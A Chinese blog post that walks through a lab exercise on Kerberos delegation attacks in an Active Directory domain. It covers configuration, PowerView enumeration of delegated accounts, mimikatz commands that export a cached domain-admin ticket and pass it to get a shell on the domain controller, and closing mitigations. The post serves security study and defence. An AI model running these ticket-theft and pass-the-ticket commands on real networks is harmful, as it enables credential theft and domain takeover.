配置kerberos_渗透测试之Kerberos委派攻击 内网入侵章

最新推荐文章于 2022-12-03 10:09:37 发布
最新推荐文章于 2022-12-03 10:09:37 发布
阅读量414 收藏 2
点赞数
文章标签: 配置kerberos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42224303/article/details/112678606
版权

0x00前言

昨天晚上在先知社区见到相关的Keberos委派攻击的文章。晚上在弄别的事情没有实验,早上抽空实验一波.

此教程文章只用于安全参考!!切勿使用技术违规操作!!

有什么其它问题地方可以私聊指出,谢谢。

0x01环境

Windows server 2008 R2:192.168.1.122 (AD)
Windows 7:192.168.1.107
工具:mimikatz、keke

0x02何为委派

先知社区的解释:域委派是指将域内部用户的权限委派给服务账号,使用服务账号能以用户的权限在域内展开活动
安全客机的解释:在域中如果出现一种使用Kerberos身份验证访问域中的服务B,而B再利用A的身份去请求域中的服务C,这个过程就可以理解为委派

0x03委派的分类

委派分为两种:

  • 非约束委派
  • 约束委派

非约束委派:
非约束委派在Kerberos中实现时,用户可以从KDC处得到的TGT发送给访问的service1(可以是任意服务),service1拿到TGT之后可以通过TGT访问域内部任意其他服务,所以被称为非约束委派。

约束委派:
由于非约束委派的不安全性,微软在Windows 2003中发布了约束委派的功能。约束委派在Kerberos中的用户不会直接发送TGT给服务,而是对发送给service1的认证信息做了限制,永久服务1代表用户使用该TGT去访问其他服务。这里包括一组S4U2Self(用户对自己的服务)和S4U2Proxy(用户对代理的服务)的Kerberos协议扩展。

0x04非约束委派的设置

在域中只有服务账户才能有委派功能,所以先把用户user01设置为服务账号。

setspn -A https/apache2.4 user01

1edb897f9dbe7d291d8b038429e684c1.png

def830f99a85bf689ce598d437fcc642.png

之后在AD编辑查看用户可以看到,非约束委派设置好的标明

193399728628dc595336714dfdc4e936.png

0x05约束委派的设置

把用户设置为服务账号

1e02aadb991d8cfff421fdbc4067f463.png

0x06两者设置后在AD EDIT的区别

当服务账号或者主机被设置为非约束性委派时,其userAccountControl属性会包含TRUSTED_FOR_DELEGATION
当服务账号或者主机被设置为约束性委派时,其userAccountControl属性包含TRUSTED_TO_AUTH_FOR_DELEGATION,并且msDS-AllowedToDelegateTo属性会包含被约束的服务

0x07非约束委派的发现

发现域中的委派主机或账户:

通过Import-Module PowerView.ps1加载PowerView脚本之后使用下面的命令进行查询。
查询域中配置非约束委派的账户:
Get-NetUser -Unconstrained -Domain <domain>
这里的PowerView是master分支的

931c6c0187eb758cfb5dc7727fa10c0f.png

查询域中配置非约束委派的主机:

Get-NetComputer -Unconstrained -Domain <domain>

4ccf87a08ba132cc8ee61c7048c9c3fa.png

0x08约束委派的发现

查询域中配置约束委派的账户:
(dev分支的powerSploit)

Get-DomainUser –TrustedToAuth -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto| fl

45e7c03a69f86deb43c0882f9f6d5f0c.png

查看设置了约束委派的用户:

Get-DomainUser -TrustedToAuth -Domain www.haq.com

2b45acb0c2a4baaf344cf6cb1dae3064.png

查询域中配置约束委派的主机:

Get-DomainComputer -TrustedToAuth -Domain <domain>

f205fc6504aa9a44414baab5a6c48200.png

0x09非约束委派的利用

假设域控用管理员账号smb登录了某台域机器,那这个时候域管理员的TGT已经缓存在域机器
使用mimikatz添加内存

privilege::debug
sekurlsa::tickets /export

09ecf0133b8c4c70b7f648edd9627a40.png

最主要的是这个(域管的TGT)

c44406c85c02595ed0c04a4b9984dc42.png

此时我们在没有凭证的情况下访问域控的共享C盘是没有权限的(图忘截了,下面的图顶替一下)

a7efa3abb9b42084eeeae260cbf7a190.png

mimikatz引入凭证

privilege::debug
kerberos::ptt [0;2c06d4]-2-0-40e00000-Administrator@krbtgt-WWW.HAQ.COM.kirbi
kerberos::list

89fa5646e3948521d891abd0416c937a.png

之后我们可以使用Enter-PSSession获取一个shell

Enter-PSSession -ComputerName <主机名>(不能IP)

640e48c70c5c4928f574a1e61bd84eab.png

0x10约束委派的利用

利用条件:

已知当前配置了约束委派的当前账户的密码

通过已知的账户名和明文密码对KDC发起请求,得到TGT

643287f80c8eb79c806cfb11a33b3a3f.png

使用kekeo申请TGS票据(我这里失败了)

96db0437c03a856ddc2947a998d0c7b7.png

所以下面的引入凭证,也不会认证成功

254574299923b996d62e21724c13e62f.png

0x11委派攻击的防御

通过上文中说到设置了非约束委派的帐户权限如果被窃取然后攻击者可能获取非常多其他账户所以最好是不要在域中使用非约束委派这种功能。
域中不需要使用委派的帐户特别是administrator帐户,设置为“敏感用户不能被委派”。
如果是win2012的系统也可以通过设置受保护的用户组来缓解委派所带来的危害。
xyPROBLEM9x
关注
内网渗透(八十八)之委派攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-21 491
委派是大型网络中经常部署的应用模式,给多跳认证带来了很大的便利与此同时也带来了很大的安全隐患。利用委派攻击者可结合其他漏洞进行组合攻击,导致攻击者可获取本地管理员权限甚至域管理员权限,还可以制作深度隐藏的后门。委派是指将域内用户的权限委派给服务账户,使得服务账户能以用户权限访问域内的其他服务。委派的流程图如图所示,域内用户A以Kerberos身份验证访问Web服务器请求下载文件,但是真正的文件在后台的文件服务器上。
kerberos.rar_Kerberos_kerberos Java_single_sso java
07-15
Kerberos协议主要用于计算机网络的身份鉴别(Authentication), 其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的票据(ticket-granting ticket)访问多个服务,即SSO(Single Sign On)。由于在每个Client和...
Windows 内网渗透之委派攻击
qq_53742230的博客
07-31 1340
委派攻击的三种攻击手法
Windows内网协议学习Kerberos篇之PAC
weixin_43171033的博客
04-21 2204
转自:https://www.anquanke.com/post/id/192810 author: daiker@360RedTeam 0x00 前言 这是kerbreos篇的最后一篇文了。这篇文主要讲的内容是微软为了访问控制而引进的一个扩展PAC,以及PAC在历史上出现过的一个严重的,允许普通用户提升到域管的漏洞MS14068。 0x01 PAC 介绍 网上很多版本的kerberos的流程是 用户向KDC发起AS_REQ,请求凭据是用户hash加密的时间戳,KDC使用用户hash进.
基于Kerberos的跨域身份认证实验
最新发布
Shirongliang的博客
12-03 2037
跨域身份认证技术是身份认证技术的一种典型应用,随着云计算的快速发展和大规模部署,传统的网络架构发生了深刻的变革,带来了新的安全挑战。在云环境下,身份提供者、认证凭证和签发机构的多元化造成用户访问时需穿越多个安全域,跨域身份认证已成为云安全的难点问题。Kerberos是一种网络认证协议,它使用对称加密的技术实现网络中的身份认证。目前大数据组件(如HDFS/ YARN/ HBase/Hive/Kafka/Spark 等等)基本上都默认支持Kerberos身份认证。
域渗透之委派攻击
谢公子的博客
07-19 4229
委派是大型网络中经常部署的应用模式,给多跳认证带来很大的便利,同时也带来很大的安全隐患,利用委派可获取域管理员权限,甚至制作深度隐藏的后门。 域委派委派是指,将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动。 服务账号(Service Account),域内用户的一种类型,服务器运行服务时所用的账号,将服务运行起来并加入域。例如MS SQL Server在安装...
JAAS.rar_Kerberos_jaas_ldap kerberos
09-14
它让你能够将一些标准的安全机制,例如Solaris NIS(网络信息服务)、Windows NT、LDAP(轻量目录存取协议),Kerberos等通过一种通用的,可配置的方式集成到系统中。本文首先向你介绍JAAS验证中的一些核心部分,...
JAAS.rar_Action!_Jaas Kerber_jaas KERBEROS_kerberos Java_login.a
09-24
_Jaas_Kerber_jaas_KERBEROS_kerberos_Java_login.a"压缩包文件包含了关于如何在Java环境中使用JAAS实现Kerberos登录和委托的示例代码。Kerberos是一种广泛使用的网络身份验证协议,它提供了强大的安全性,通过一次...
ansible-role-configure_kerberos_kdcs:配置Kerberos KDC
04-08
configure_kerberos_kdcs 配置Kerberos KDC 要求 没有任何。 角色变量 没有任何。 依存关系 没有任何 剧本范例 - hosts: servers roles: - { role: 'johanneskastl.configure_kerberos_kdcs' } 执照 BSD-3条款 ...
Windows-Server-AD-Kerberos-LDAP.zip_AD kerberos_AD ldap_Kerberos
09-24
3. **会话密钥**:Kerberos使用会话密钥来加密通信,防止中间人攻击。 4. **Ticket Granting Ticket(TGT)**:用户获得的TGT可以在有效期内用于获取其他服务的票证,无需再次身份验证。 **Lightweight Directory ...
windows中关于委派(delegation)的理解
热门推荐
Shanfenglan's blog
09-24 17万+
CATALOG前言委派一些问题S4U2SELF延伸S4U2PROXY非约束性委派约束性委派基于资源的约束性委派基于委派攻击非约束委派攻击约束委派攻击基于资源的约束委派攻击 前言 委派一般出现在域环境中。它是一种机制,在kerberos认证的时候会涉及到。不正确的委派配置,可能使攻击者达到提权的目的。 委派 假设域内用户A需要访问服务器B,并需要以A的身份对服务器的端数据库进行更改。则A就会进行一个kerberos认证,来获取访问B的ticket。这时候就需要用到委派,也就是说,A依旧访问B且只申请一个访
Kerberos协议之委派
weixin_44216796的博客
01-10 745
什么是委派 在域中如果出现A使用Kerberos身份验证访问域中的服务B,而B再利用A的身份去请求域中的服务C,这个过程就可以理解为委派。 例: User访问主机s2上的HTTP服务,而HTTP服务需要请求其他主机的SQLServer数据库,但是S2并不知道User是否有权限访问SQLServer,这时HTTP服务会利用User的身份去访问SQLServer,如果User有权限访问SQLServer服务才能访问成功。 而委派主要分为非约束委派(Unconstraineddelegation)和约束委派(C
Kerberos无约束委派攻击和防御
weixin_30480583的博客
07-05 785
0x00 前言简介 当Active Directory首次与Windows 2000 Server一起发布时,Microsoft就提供了一种简单的机制来支持用户通过Kerberos对Web服务器进行身份验证并需要授权用户更新后端数据库服务器上的记录的方案。这通常被称为Kerberos double-hop issue(双跃点问题),需要委派才能使Web服务器在修改数据库记录时模拟用户操作。 ...
Kerberos 委派攻击原理之 S4U2 利用详解
systemino的博客
07-07 1694
Kerberos 委派攻击原理之 S4U2 利用详解 为了更好地防止约束委派的滥用,请查看"从Kekeo到Rubeus"文中的"s4u"部分。 几周前,我和同事李·克里斯滕森(在他的帮助下我完成了这篇文和相关材料)花了一些时间深入研究了活动目录的S4U2Self和S4U2Proxy协议扩展。就在最近,本杰明·德尔皮和Ben Campbell在推特上就同一话题进行...
kerberos委派详解
蚁景网安学院
10-08 2051
委派委派是指,将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动。服务账号(Service Account),域内用户的一种类型,服务器运行服务时所用的账号,将服务运行...
kerberos使用中遇到的问题
玩物
03-17 1万+
公司的kerberos认证使用了很久,但是最近新上的一批服务器无法直接免密登录,需要输入密码。此问题查询了将近一个礼拜后,终于得到解决。kerberos的系统组成有至少三部分。1.ServerA (kdc kerberos-admin(kerberos服务端)) 2.ServerB (client(kerberos user),所有用户可以通过这个服务器从服务端索要凭据)。 3.ServerC(服
[内网渗透]Kerberos 认证
weixin_47224111的博客
12-30 2895
Kerberos 认证 简介 Kerberos诞生与上个世纪九十年代,被广泛用于各大操作系统和Hadoop生态系统中。 kerberos的作用 kertberos提供了一种单点登录(SSO)的方法,在内网里有很多服务器,提供一个第三方可信的认证服务器,供其他服务器使用,这样任何客户端就只需要一个密码就能登录每个服务器。 Kerberos的角色(简化) 认证服务器(AS),客户端(Client),普通服务器(Server),客户端和服务器在AS的帮助下完成相互认证,在Kerberos系统里,客户端和服务器都有
域内横向渗透-PTT票据传递之kerberos认证原理详解
m0_62783065的博客
09-21 365
域内横向渗透-PTT票据传递之kerberos认证原理详解
Kerberos 安装
博学而笃志,切问而近思
06-21 1312
Kerberos Install Kerberos 安装 节点信息 name01 datanode01 datanode02 datanode03 datanode04 安装 kdc server 在KDC(name01)上安装包 krb5、krb5-server 和 krb5-client yum install krb5-server krb5-libs kr...
Windows环境下配置Kerberos认证指南
"Windows环境下配置Kerberos认证以访问Hive数据库" Kerberos是一种网络认证协议,它设计用于提供安全的网络服务。该协议通过在客户端和服务端之间提供基于票证的身份验证,确保了通信双方的身份是可信的。在Windows...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值